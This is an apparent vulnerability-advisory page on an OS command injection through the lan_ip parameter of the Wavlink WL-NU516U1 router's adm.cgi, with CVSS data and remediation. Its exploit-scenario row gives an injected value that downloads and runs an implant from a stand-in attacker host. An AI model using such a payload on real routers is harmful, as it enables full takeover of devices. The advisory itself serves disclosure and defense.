Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-accessible CGI endpoint requires low-privilege auth (PR:L); OS command injection on a router realistically yields full device control, warranting C:H/I:H/A:H.
Primary rating from Vendor (VulDB).
CVSS VectorVendor: VulDB
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
A security flaw has been discovered in Wavlink WL-NU516U1 260515. This affects the function wlink_uci_set_value of the file /cgi-bin/adm.cgi. Performing a manipulation of the argument lan_ip results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. You should upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.
AnalysisAI
OS command injection in the Wavlink WL-NU516U1 router's CGI web administration interface allows authenticated network attackers to execute arbitrary operating system commands by injecting shell metacharacters into the lan_ip parameter of the adm.cgi endpoint. The wlink_uci_set_value function passes attacker-controlled input unsanitized into OS-level commands, enabling full compromise of the underlying Linux-based router OS. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires low-privilege authenticated access to the router's web administration interface, confirmed by the CVSS 4.0 PR:L metric. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The vendor-supplied CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:L/UI:N) with exploit maturity E:P produces a score of 5.3 Medium. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with low-privilege authenticated access to the Wavlink WL-NU516U1 admin panel sends a crafted POST request to /cgi-bin/adm.cgi with the lan_ip parameter containing shell injection characters (e.g., '192.168.1.1;wget http://attacker.com/implant -O /tmp/x;chmod +x /tmp/x;/tmp/x'). The wlink_uci_set_value function passes the unsanitized value directly into an OS command, executing the injected payload at the privilege level of the web server process. … |
| Remediation | Upgrade to the vendor-patched firmware released June 22, 2026: WINSTAR_NU516U1-WO-A-2026-06-22-5ccde97-mt7628-squashfs-sysupgrade.bin, available directly from Wavlink at https://dl.wavlink.com/firmware/RD/WINSTAR_NU516U1-WO-A-2026-06-22-5ccde97-mt7628-squashfs-sysupgrade.bin. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Wl Nu516U1
View allSame weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-43254
GHSA-f39c-wxvq-c7vx